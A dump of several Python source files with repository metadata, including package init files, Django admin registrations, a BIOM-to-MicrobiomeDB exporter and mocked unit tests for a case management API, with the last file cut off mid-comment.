85130f3e4ad5c5120ad2e6f0fda31687cde600e1
48
py
Python
tests/unit/__init__.py
Agi-dev/pylaas
7cb6a3e1d560843886b27d4fa5aaf9ff74a555f7
[ "MIT" ]
null
null
null
tests/unit/__init__.py
Agi-dev/pylaas
7cb6a3e1d560843886b27d4fa5aaf9ff74a555f7
[ "MIT" ]
null
null
null
tests/unit/__init__.py
Agi-dev/pylaas
7cb6a3e1d560843886b27d4fa5aaf9ff74a555f7
[ "MIT" ]
null
null
null
from pylaas.pylaas import Pylaas Pylaas.init()
12
32
0.791667
7
48
5.428571
0.571429
0.631579
0
0
0
0
0
0
0
0
0
0
0.125
48
3
33
16
0.904762
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
51e0a0bde3e606a8d923a4a2f6c574587c3699aa
94
py
Python
gdcdatamodel/validators/__init__.py
uc-cdis/gdcdatamodel
731c6fee160586dde4e5ff3bc76f131201c71543
[ "Apache-2.0" ]
27
2016-06-24T20:32:44.000Z
2022-01-17T07:53:48.000Z
gdcdatamodel/validators/__init__.py
NCI-GDC/gdcdatamodel
924fc8ab695b1cbb0131636ffcb6d3881db2e200
[ "Apache-2.0" ]
63
2016-07-20T21:40:11.000Z
2021-08-12T18:39:21.000Z
gdcdatamodel/validators/__init__.py
uc-cdis/gdcdatamodel
731c6fee160586dde4e5ff3bc76f131201c71543
[ "Apache-2.0" ]
5
2016-10-20T20:00:09.000Z
2020-08-14T08:55:40.000Z
from .json_validators import GDCJSONValidator from .graph_validators import GDCGraphValidator
31.333333
47
0.893617
10
94
8.2
0.7
0.390244
0
0
0
0
0
0
0
0
0
0
0.085106
94
2
48
47
0.953488
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cfdf91ae1cb6e8022118a3f1b41c2937678fb7cc
160
py
Python
reports/admin.py
mikael19/activity
3932de42d9b423bff5739f7e06520035df213fc6
[ "Apache-2.0" ]
60
2020-02-13T17:20:43.000Z
2022-03-12T19:26:04.000Z
reports/admin.py
mikael19/activity
3932de42d9b423bff5739f7e06520035df213fc6
[ "Apache-2.0" ]
449
2020-02-12T22:18:00.000Z
2022-03-11T23:36:59.000Z
reports/admin.py
mikael19/activity
3932de42d9b423bff5739f7e06520035df213fc6
[ "Apache-2.0" ]
31
2020-03-07T21:00:54.000Z
2021-07-14T18:37:34.000Z
#!/usr/bin/python3 # -*- coding: utf-8 -*- from django.contrib import admin from .models import Report, ReportAdmin admin.site.register(Report, ReportAdmin)
17.777778
40
0.7375
21
160
5.619048
0.761905
0.288136
0
0
0
0
0
0
0
0
0
0.014286
0.125
160
8
41
20
0.828571
0.24375
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.666667
0
0.666667
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cfe98e2e60d9e9fba419167cf7355bbd889f6279
181
py
Python
students/k3342/laboratory_works/Evgenov_Sergei/laboratory_work_1/homework_project_evgenov/homework_app/admin.py
TonikX/ITMO_ICT_-WebProgramming_2020
ba566c1b3ab04585665c69860b713741906935a0
[ "MIT" ]
10
2020-03-20T09:06:12.000Z
2021-07-27T13:06:02.000Z
students/k3342/laboratory_works/Evgenov_Sergei/laboratory_work_1/homework_project_evgenov/homework_app/admin.py
TonikX/ITMO_ICT_-WebProgramming_2020
ba566c1b3ab04585665c69860b713741906935a0
[ "MIT" ]
134
2020-03-23T09:47:48.000Z
2022-03-12T01:05:19.000Z
students/k3342/laboratory_works/Evgenov_Sergei/laboratory_work_1/homework_project_evgenov/homework_app/admin.py
TonikX/ITMO_ICT_-WebProgramming_2020
ba566c1b3ab04585665c69860b713741906935a0
[ "MIT" ]
71
2020-03-20T12:45:56.000Z
2021-10-31T19:22:25.000Z
from django.contrib import admin # Register your models here. from .models import Homework from .models import Comment admin.site.register(Homework) admin.site.register(Comment)
18.1
32
0.80663
25
181
5.84
0.48
0.136986
0.219178
0
0
0
0
0
0
0
0
0
0.121547
181
9
33
20.111111
0.918239
0.143646
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.6
0
0.6
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
3204af199cb003e852ca0760cb9defcf59d47794
151
py
Python
active_learning_ts/instance_properties/objectives/constant_instance_objective.py
hassberg/active_learning_ts
7ebdabd3349d3ac4ea2761a8aa869b8d222a2d83
[ "MIT" ]
1
2022-02-14T09:38:22.000Z
2022-02-14T09:38:22.000Z
active_learning_ts/instance_properties/objectives/constant_instance_objective.py
hassberg/active_learning_ts
7ebdabd3349d3ac4ea2761a8aa869b8d222a2d83
[ "MIT" ]
1
2022-02-11T12:13:31.000Z
2022-02-11T12:13:31.000Z
active_learning_ts/instance_properties/objectives/constant_instance_objective.py
hassberg/active_learning_ts
7ebdabd3349d3ac4ea2761a8aa869b8d222a2d83
[ "MIT" ]
2
2021-12-15T12:56:30.000Z
2022-02-01T15:31:08.000Z
from active_learning_ts.instance_properties.instance_objective import InstanceObjective class ConstantInstanceObjective(InstanceObjective): pass
25.166667
87
0.880795
14
151
9.214286
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.086093
151
5
88
30.2
0.934783
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
5c89e099dbb6487518321274d452146bff4c881c
31
py
Python
d3rlpy/metrics/__init__.py
YangRui2015/d3rlpy
da778b2a2b0afbafe25395296baecd0d4d0cd0d5
[ "MIT" ]
1
2021-05-08T06:21:05.000Z
2021-05-08T06:21:05.000Z
d3rlpy/metrics/__init__.py
YangRui2015/d3rlpy
da778b2a2b0afbafe25395296baecd0d4d0cd0d5
[ "MIT" ]
null
null
null
d3rlpy/metrics/__init__.py
YangRui2015/d3rlpy
da778b2a2b0afbafe25395296baecd0d4d0cd0d5
[ "MIT" ]
null
null
null
from . import comparer, scorer
15.5
30
0.774194
4
31
6
1
0
0
0
0
0
0
0
0
0
0
0
0.16129
31
1
31
31
0.923077
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7a91c7a166a3924e77fb2de527555edf8c09057c
27
py
Python
utils/__init__.py
xdr940/monodepth2_Xavier
6d7d522237df8552644c1c10f97b309be5b53498
[ "MIT" ]
2
2020-10-26T08:14:03.000Z
2020-11-19T07:49:25.000Z
utils/__init__.py
maomingyang/monodepth2_Xavier
80bb9d34cacdfe7d1852a67405c2f8611f1f90e1
[ "MIT" ]
null
null
null
utils/__init__.py
maomingyang/monodepth2_Xavier
80bb9d34cacdfe7d1852a67405c2f8611f1f90e1
[ "MIT" ]
1
2020-10-26T08:14:06.000Z
2020-10-26T08:14:06.000Z
from .logger import Writer
13.5
26
0.814815
4
27
5.5
1
0
0
0
0
0
0
0
0
0
0
0
0.148148
27
1
27
27
0.956522
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8f8443c5e076bbde5f69f55086b6374ba65b00ae
18,503
py
Python
Tools/lib/python/eupath/BiomFileMicrobiomeDbExporter.py
VEuPathDB/EuPathGalaxy
39768986ebe9555870d9435b523da768935fa4fe
[ "Apache-2.0" ]
null
null
null
Tools/lib/python/eupath/BiomFileMicrobiomeDbExporter.py
VEuPathDB/EuPathGalaxy
39768986ebe9555870d9435b523da768935fa4fe
[ "Apache-2.0" ]
null
null
null
Tools/lib/python/eupath/BiomFileMicrobiomeDbExporter.py
VEuPathDB/EuPathGalaxy
39768986ebe9555870d9435b523da768935fa4fe
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python from . import EupathExporter import biom from biom.cli.table_validator import _validate_table from biom.parse import load_table class BiomExport(EupathExporter.Export): BIOM_TYPE = "BIOM" BIOM_VERSION = "1.0, 2.0, or 2.1" def __init__(self, args): """ Initializes the gene list export class with the parameters needed to accomplish the particular type of export. :param args: parameters provided from tool form """ EupathExporter.Export.__init__(self, BiomExport.BIOM_TYPE, BiomExport.BIOM_VERSION, None, args) # generic 7 arguments and then dataset file path if len(args) < 8: raise EupathExporter.ValidationException("The tool was passed an insufficient numbers of arguments:", args) self._dataset_file_path = args[7] def validate_datasets(self): # try read a file # gives stupid errors like "Invalid format 'Biological Observation Matrix 0.9.1-dev', must be '1.0.0'" # valid, report = _validate_table(self._dataset_file_path) # if not valid: # raise EupathExporter.ValidationException(report) try: table=load_table(self._dataset_file_path) except ValueError, e: raise EupathExporter.ValidationException("Could not load the file as BIOM - does it conform to the specification on https://biom-format.org?", e) give_table_extra_methods(table) generated_by="MicrobiomeDb exporter" with open(self._dataset_file_path+".metadata.json", 'w') as f1: table.to_json_but_only_metadata(generated_by, direct_io=f1) with open(self._dataset_file_path+".data.tsv", 'w') as f2: table.to_json_but_only_data_and_not_json_but_tsv(generated_by, direct_io=f2) def identify_dependencies(self): return [] def identify_projects(self): return ["MicrobiomeDB"] def identify_supported_projects(self): return ["MicrobiomeDB"] def identify_dataset_files(self): return [ {"name": "uploaded.biom", "path": self._dataset_file_path}, {"name": "metadata.json", "path": self._dataset_file_path+".metadata.json"}, {"name": "data.tsv", "path": self._dataset_file_path + ".data.tsv"} ] def output_success(self): header = "<html><body><h1>Good news!</h1><br />" msg = """ <h2>Results of the VEuPathDB Export Tool<br />BIOM files to MicrobiomeDB</h2> <h3>Your BIOM file was exported from Galaxy to your account in VEuPathDB. For file access, go to the My Data Sets section on MicrobiomeDB: <a href='http://microbiomedb.org/mbio/app/workspace/datasets'>My Data Sets</a><br /> </h3><br /> </body></html> """ with open(self._output, 'w') as file: file.write("%s%s" % (header,msg)) def give_table_extra_methods(table): # just my looking at the name you know this is gonna be good isn't it # takes a table and attaches these two methods to it: # - to_json_but_only_metadata # - to_json_but_only_data_and_not_json_but_tsv # # Done by twice replicating the 200 lines long method from # https://github.com/biocore/biom-format/blob/fd84172794d14a741a5764234d7a28416b9dba08/biom/table.py#L4451 # and judiciously commenting stuff out # # View in python-coloring editor to see what got commented out or diff with the package code to find out how they were changed # Scroll to the bottom of the file to see how they get added # # # Here are the globals # from future.utils import string_types def get_biom_format_version_string(version=None): """Returns the current Biom file format version. Parameters ---------- version : tuple a tuple containing the version number of the biom table """ if version is None: return "Biological Observation Matrix 1.0.0" else: return "Biological Observation Matrix %s.%s.0" % (version[0], version[1]) def get_biom_format_url_string(): return "http://biom-format.org" from datetime import datetime from json import dumps def to_json_but_only_metadata(self, generated_by, direct_io=None): """Returns a JSON string representing the table in BIOM format. Parameters ---------- generated_by : str a string describing the software used to build the table direct_io : file or file-like object, optional Defaults to ``None``. Must implementing a ``write`` function. If `direct_io` is not ``None``, the final output is written directly to `direct_io` during processing. Returns ------- str A JSON-formatted string representing the biom table """ if not isinstance(generated_by, string_types): raise TableException("Must specify a generated_by string") # Fill in top-level metadata. if direct_io: direct_io.write(u'{') direct_io.write(u'"id": "%s",' % str(self.table_id)) direct_io.write( u'"format": "%s",' % get_biom_format_version_string((1, 0))) # JSON table -> 1.0.0 direct_io.write( u'"format_url": "%s",' % get_biom_format_url_string()) direct_io.write(u'"generated_by": "%s",' % generated_by) direct_io.write(u'"date": "%s",' % datetime.now().isoformat()) else: id_ = u'"id": "%s",' % str(self.table_id) format_ = u'"format": "%s",' % get_biom_format_version_string( (1, 0)) # JSON table -> 1.0.0 format_url = u'"format_url": "%s",' % get_biom_format_url_string() generated_by = u'"generated_by": "%s",' % generated_by date = u'"date": "%s",' % datetime.now().isoformat() # Determine if we have any data in the matrix, and what the shape of # the matrix is. try: num_rows, num_cols = self.shape except: # noqa num_rows = num_cols = 0 has_data = True if num_rows > 0 and num_cols > 0 else False # Default the matrix element type to test to be an integer in case we # don't have any data in the matrix to test. test_element = 0 if has_data: test_element = self[0, 0] # Determine the type of elements the matrix is storing. if isinstance(test_element, int): matrix_element_type = u"int" elif isinstance(test_element, float): matrix_element_type = u"float" elif isinstance(test_element, string_types): matrix_element_type = u"str" else: raise TableException("Unsupported matrix data type.") # Fill in details about the matrix. if direct_io: direct_io.write( u'"matrix_element_type": "%s",' % matrix_element_type) direct_io.write(u'"shape": [%d, %d],' % (num_rows, num_cols)) else: matrix_element_type = u'"matrix_element_type": "%s",' % \ matrix_element_type shape = u'"shape": [%d, %d],' % (num_rows, num_cols) # Fill in the table type if self.type is None: type_ = u'"type": null,' else: type_ = u'"type": "%s",' % self.type if direct_io: direct_io.write(type_) # Fill in details about the rows in the table and fill in the matrix's # data. BIOM 2.0+ is now only sparse if direct_io: direct_io.write(u'"matrix_type": "sparse",') """ direct_io.write(u'"data": [') """ else: matrix_type = u'"matrix_type": "sparse",' """ data = [u'"data": ['] """ data=[] max_row_idx = len(self.ids(axis='observation')) - 1 max_col_idx = len(self.ids()) - 1 rows = [u'"rows": ['] have_written = False for obs_index, obs in enumerate(self.iter(axis='observation')): # i'm crying on the inside if obs_index != max_row_idx: rows.append(u'{"id": %s, "metadata": %s},' % (dumps(obs[1]), dumps(obs[2]))) else: rows.append(u'{"id": %s, "metadata": %s}],' % (dumps(obs[1]), dumps(obs[2]))) # turns out its a pain to figure out when to place commas. the # simple work around, at the expense of a little memory # (bound by the number of samples) is to build of what will be # written, and then add in the commas where necessary. built_row = [] for col_index, val in enumerate(obs[0]): if float(val) != 0.0: built_row.append(u"[%d,%d,%r]" % (obs_index, col_index, val)) """ if built_row: # if we have written a row already, its safe to add a comma if have_written: if direct_io: direct_io.write(u',') else: data.append(u',') if direct_io: direct_io.write(u','.join(built_row)) else: data.append(u','.join(built_row)) have_written = True """ """ # finalize the data block if direct_io: direct_io.write(u"],") else: data.append(u"],") """ # Fill in details about the columns in the table. columns = [u'"columns": ['] for samp_index, samp in enumerate(self.iter()): if samp_index != max_col_idx: columns.append(u'{"id": %s, "metadata": %s},' % ( dumps(samp[1]), dumps(samp[2]))) else: columns.append(u'{"id": %s, "metadata": %s}]' % ( dumps(samp[1]), dumps(samp[2]))) if rows[0] == u'"rows": [' and len(rows) == 1: # empty table case rows = [u'"rows": [],'] columns = [u'"columns": []'] rows = u''.join(rows) columns = u''.join(columns) if direct_io: direct_io.write(rows) direct_io.write(columns) direct_io.write(u'}') else: return u"{%s}" % ''.join([id_, format_, format_url, matrix_type, generated_by, date, type_, matrix_element_type, shape, u''.join(data), rows, columns]) # This is also copy pasted from # https://github.com/biocore/biom-format/blob/fd84172794d14a741a5764234d7a28416b9dba08/biom/table.py#L4451 def to_json_but_only_data_and_not_json_but_tsv(self, generated_by, direct_io=None): """Returns a JSON string representing the table in BIOM format. Parameters ---------- generated_by : str a string describing the software used to build the table direct_io : file or file-like object, optional Defaults to ``None``. Must implementing a ``write`` function. If `direct_io` is not ``None``, the final output is written directly to `direct_io` during processing. Returns ------- str A JSON-formatted string representing the biom table """ """ if not isinstance(generated_by, string_types): raise TableException("Must specify a generated_by string") # Fill in top-level metadata. if direct_io: direct_io.write(u'{') direct_io.write(u'"id": "%s",' % str(self.table_id)) direct_io.write( u'"format": "%s",' % get_biom_format_version_string((1, 0))) # JSON table -> 1.0.0 direct_io.write( u'"format_url": "%s",' % get_biom_format_url_string()) direct_io.write(u'"generated_by": "%s",' % generated_by) direct_io.write(u'"date": "%s",' % datetime.now().isoformat()) else: id_ = u'"id": "%s",' % str(self.table_id) format_ = u'"format": "%s",' % get_biom_format_version_string( (1, 0)) # JSON table -> 1.0.0 format_url = u'"format_url": "%s",' % get_biom_format_url_string() generated_by = u'"generated_by": "%s",' % generated_by date = u'"date": "%s",' % datetime.now().isoformat() # Determine if we have any data in the matrix, and what the shape of # the matrix is. try: num_rows, num_cols = self.shape except: # noqa num_rows = num_cols = 0 has_data = True if num_rows > 0 and num_cols > 0 else False # Default the matrix element type to test to be an integer in case we # don't have any data in the matrix to test. test_element = 0 if has_data: test_element = self[0, 0] # Determine the type of elements the matrix is storing. if isinstance(test_element, int): matrix_element_type = u"int" elif isinstance(test_element, float): matrix_element_type = u"float" elif isinstance(test_element, string_types): matrix_element_type = u"str" else: raise TableException("Unsupported matrix data type.") # Fill in details about the matrix. if direct_io: direct_io.write( u'"matrix_element_type": "%s",' % matrix_element_type) direct_io.write(u'"shape": [%d, %d],' % (num_rows, num_cols)) else: matrix_element_type = u'"matrix_element_type": "%s",' % \ matrix_element_type shape = u'"shape": [%d, %d],' % (num_rows, num_cols) # Fill in the table type if self.type is None: type_ = u'"type": null,' else: type_ = u'"type": "%s",' % self.type if direct_io: direct_io.write(type_) # Fill in details about the rows in the table and fill in the matrix's # data. BIOM 2.0+ is now only sparse if direct_io: direct_io.write(u'"matrix_type": "sparse",') direct_io.write(u'"data": [') else: matrix_type = u'"matrix_type": "sparse",' data = [u'"data": ['] max_row_idx = len(self.ids(axis='observation')) - 1 max_col_idx = len(self.ids()) - 1 rows = [u'"rows": ['] have_written = False """ for obs_index, obs in enumerate(self.iter(axis='observation')): """ # i'm crying on the inside if obs_index != max_row_idx: rows.append(u'{"id": %s, "metadata": %s},' % (dumps(obs[1]), dumps(obs[2]))) else: rows.append(u'{"id": %s, "metadata": %s}],' % (dumps(obs[1]), dumps(obs[2]))) # turns out its a pain to figure out when to place commas. the # simple work around, at the expense of a little memory # (bound by the number of samples) is to build of what will be # written, and then add in the commas where necessary. built_row = [] """ for col_index, val in enumerate(obs[0]): if float(val) != 0.0: if direct_io: direct_io.write(u"%d\t%d\t%r\n" % (obs_index, col_index, val)) else: data.append([obs_index, col_index, val]) """ built_row.append(u"[%d,%d,%r]" % (obs_index, col_index, val)) if built_row: # if we have written a row already, its safe to add a comma if have_written: if direct_io: direct_io.write(u',') else: data.append(u',') if direct_io: direct_io.write(u','.join(built_row)) else: data.append(u','.join(built_row)) have_written = True """ """ # finalize the data block if direct_io: direct_io.write(u"],") else: data.append(u"],") # Fill in details about the columns in the table. columns = [u'"columns": ['] for samp_index, samp in enumerate(self.iter()): if samp_index != max_col_idx: columns.append(u'{"id": %s, "metadata": %s},' % ( dumps(samp[1]), dumps(samp[2]))) else: columns.append(u'{"id": %s, "metadata": %s}]' % ( dumps(samp[1]), dumps(samp[2]))) if rows[0] == u'"rows": [' and len(rows) == 1: # empty table case rows = [u'"rows": [],'] columns = [u'"columns": []'] rows = u''.join(rows) columns = u''.join(columns) if direct_io: direct_io.write(rows) direct_io.write(columns) direct_io.write(u'}') else: return u"{%s}" % ''.join([id_, format_, format_url, matrix_type, generated_by, date, type_, matrix_element_type, shape, u''.join(data), rows, columns]) """ # # # Here's the patching # Taken from https://stackoverflow.com/a/28060251 # # table.to_json_but_only_metadata = to_json_but_only_metadata.__get__(table) table.to_json_but_only_data_and_not_json_but_tsv = to_json_but_only_data_and_not_json_but_tsv.__get__(table)
39.620985
157
0.529806
2,253
18,503
4.166001
0.146028
0.052845
0.048476
0.043256
0.764223
0.737375
0.711485
0.708928
0.708928
0.703068
0
0.014602
0.355996
18,503
466
158
39.706009
0.773078
0.103983
0
0.207101
0
0.011834
0.175399
0.005239
0
0
0
0
0
0
null
null
0.005917
0.04142
null
null
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
8fad947383ebed4a8dc5105f198868d325d01faf
26
py
Python
docs/test.py
sn696/nlp
2fecf255e138f770281e41c416d7943c88e984b0
[ "Apache-2.0" ]
null
null
null
docs/test.py
sn696/nlp
2fecf255e138f770281e41c416d7943c88e984b0
[ "Apache-2.0" ]
null
null
null
docs/test.py
sn696/nlp
2fecf255e138f770281e41c416d7943c88e984b0
[ "Apache-2.0" ]
null
null
null
def bla(): print("HI")
13
15
0.5
4
26
3.25
1
0
0
0
0
0
0
0
0
0
0
0
0.230769
26
2
15
13
0.65
0
0
0
0
0
0.074074
0
0
0
0
0
0
1
0.5
true
0
0
0
0.5
0.5
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
0
1
0
6
8fb2489cd1dd2952b86b11284654e9047e428b6f
20,760
py
Python
unit_tests/test_case.py
LandRegistry/digital-street-case-management-api
e1a44deede52c257dd0d2655e276242fbedb406d
[ "MIT" ]
null
null
null
unit_tests/test_case.py
LandRegistry/digital-street-case-management-api
e1a44deede52c257dd0d2655e276242fbedb406d
[ "MIT" ]
null
null
null
unit_tests/test_case.py
LandRegistry/digital-street-case-management-api
e1a44deede52c257dd0d2655e276242fbedb406d
[ "MIT" ]
3
2019-04-26T06:37:25.000Z
2021-04-11T05:22:28.000Z
from unittest import TestCase, mock from case_management_api.exceptions import ConflictError from case_management_api.main import app from case_management_api.extensions import db from case_management_api.models import Case, User, Address, X500Name import json import copy # Test data address = Address("1", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") seller_address = Address("11", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") seller = User(1, "Lisa", "Seller", "lisa.seller@example.com", "12345678901", seller_address) seller_conveyancer_address = Address("12", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") seller_conveyancer1 = User(2, "Natasha", "Conveyancer", "natasha.conveyancer@example.com", "10293847565", seller_conveyancer_address) seller_conveyancer2 = User(3, "Tash", "Conveyancer", "natasha2.conveyancer@example.com", "10293847567", seller_conveyancer_address) buyer_address = Address("13", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") buyer = User(4, "David", "Buyer", "david.buyer@example.com", "10987654321", buyer_address) buyer_conveyancer_address = Address("14", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") buyer_conveyancer = User(5, "Samuel", "Conveyancer", "samuel.conveyancer@example.com", "10293847566", buyer_conveyancer_address) case1 = Case("sell", "ABCD123", seller_conveyancer1, seller, buyer, X500Name("Conveyancer B", "Plymouth", "GB"), buyer_conveyancer, address) case2 = Case("sell", "ABCD123", seller_conveyancer2, seller, buyer, X500Name("Conveyancer B", "Plymouth", "GB"), buyer_conveyancer, address) case2.title_number = "ZQV888860" case3 = Case("sell", "DCBA321", seller_conveyancer1, seller, buyer, X500Name("Conveyancer B", "Plymouth", "GB"), buyer_conveyancer, address) case3.title_number = "ZQV888860" case3.status = "completed" standard_dict = { "case_reference": "ABCD123".upper(), "case_type": "buy", "assigned_staff_id": 3, "client_id": 1, "status": "active", "address": { "house_name_number": "1", "street": "Digital Street", "town_city": "Bristol", "county": "Bristol", "country": "England", "postcode": "BS2 8EN" }, "title_number": "ZQV888860", "counterparty_id": 2, "counterparty_conveyancer_org": { "organisation": "Generic Conveyancing Company", "locality": "Plymouth", "country": "GB", "state": "Devon" }, "counterparty_conveyancer_contact_id": 4 } # Tests the Case endpoints class TestCases(TestCase): def setUp(self): """Sets up the tests.""" self.app = app.test_client() @mock.patch.object(db.Model, 'query') def test_001_get_cases(self, mock_db_query): """Gets a list of all cases.""" mock_db_query.all.return_value = [case1, case2] response = self.app.get('/v1/cases', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 2) @mock.patch.object(db.Model, 'query') def test_002_get_cases_for_assigned_staff(self, mock_db_query): """Gets a list of all cases with the assigned member of staff.""" mock_db_query.filter_by.return_value.all.return_value = [case1, case3] response = self.app.get('/v1/cases?assigned_staff_id=1', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 2) @mock.patch.object(db.Model, 'query') def test_003_get_cases_for_title_number(self, mock_db_query): """Gets a list of all cases with the title number.""" mock_db_query.filter_by.return_value.all.return_value = [case2, case3] response = self.app.get('/v1/cases?title_number=ZQV888860', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 2) @mock.patch.object(db.Model, 'query') def test_004_get_cases_for_status(self, mock_db_query): """Gets a list of all cases with the status.""" mock_db_query.filter_by.return_value.all.return_value = [case1, case2] response = self.app.get('/v1/cases?status=active', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 2) @mock.patch.object(db.Model, 'query') def test_004_get_cases_for_status_and_title_number(self, mock_db_query): """Gets a list of all cases with the status.""" mock_db_query.filter_by.return_value.filter_by.return_value.all.return_value = [case2] response = self.app.get('/v1/cases?status=active&title_number=ZQV888860', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 1) @mock.patch.object(db.Model, 'query') def test_005_get_case(self, mock_db_query): """Gets a specified case.""" mock_db_query.get.return_value = case1 response = self.app.get('/v1/cases/' + case1.case_reference, headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(response.json['case_reference'], 'ABCD123') @mock.patch.object(db.Model, 'query') def test_006_get_case_invalid_case_ref(self, mock_db_query): """The given case reference does not exist.""" mock_db_query.get.return_value = None response = self.app.get('/v1/cases/N0-1D', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 404) self.assertIn('Case not found', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') def test_007_create_case(self, mock_db_query, mock_db_add, mock_db_commit): """Creates a case.""" mock_db_query.get.side_effect = [ case1.assigned_staff, case1.client, case1.counterparty, case1.counterparty_conveyancer_contact ] response = self.app.post('/v1/cases', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 201) self.assertEqual(response.json['status'], 'active') # Check we call the correct two database methods self.assertTrue(mock_db_add.called) self.assertTrue(mock_db_commit.called) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_title_number') def test_010_create_case_title_number_already_exists(self, mock_case_set_title_number, mock_db_query, mock_db_add, mock_db_commit): """The given title number already exists for an active case.""" mock_db_query.filter_by.return_value.first.side_effect = [ case1.assigned_staff, case1.client, case1.counterparty, case1.counterparty_conveyancer_contact ] mock_case_set_title_number.side_effect = ConflictError('An active case with this title number already exists') response = self.app.post('/v1/cases', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 409) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('An active case with this title number already exists', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_status') def test_010_create_case_invalid_status(self, mock_case_set_status, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.filter_by.return_value.first.side_effect = [ case1.assigned_staff, case1.client, case1.counterparty, case1.counterparty_conveyancer_contact ] mock_case_set_status.side_effect = ValueError('Status is invalid') local_standard_dict = copy.deepcopy(standard_dict) local_standard_dict['status'] = 'invalid status here' response = self.app.post('/v1/cases', data=json.dumps(local_standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 400) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertTrue( 'Status is invalid' in response.json['error_message'] or 'is not one of' in response.json['error_message'] ) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_status') def test_010_create_case_title_number_already_exists_status(self, mock_case_set_status, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.filter_by.return_value.first.side_effect = [ case1.assigned_staff, case1.client, case1.counterparty, case1.counterparty_conveyancer_contact ] mock_case_set_status.side_effect = ConflictError('An active case with this title number already exists') response = self.app.post('/v1/cases', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 409) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('An active case with this title number already exists', response.json['error_message']) # @mock.patch.object(db.session, 'commit') # @mock.patch.object(db.session, 'add') # @mock.patch.object(db.Model, 'query') # def test_008_create_case_invalid_json(self, mock_db_query, mock_db_add, mock_db_commit): # """The json data used to create the case is invalid.""" # local_standard_dict = copy.deepcopy(standard_dict) # del local_standard_dict['title_number'] # response = self.app.post('/v1/cases', data=json.dumps(local_standard_dict), # headers={'accept': 'application/json', 'content-type': 'application/json'}) # print(response.get_data().decode()) # self.assertEqual(response.status_code, 400) # self.assertIn('"error_message":"\'case_reference\' is a required property', response.json['error_message']) # # check we haven't tried calling the postgres database # self.assertFalse(mock_db_query.called) # # Check we do not call the 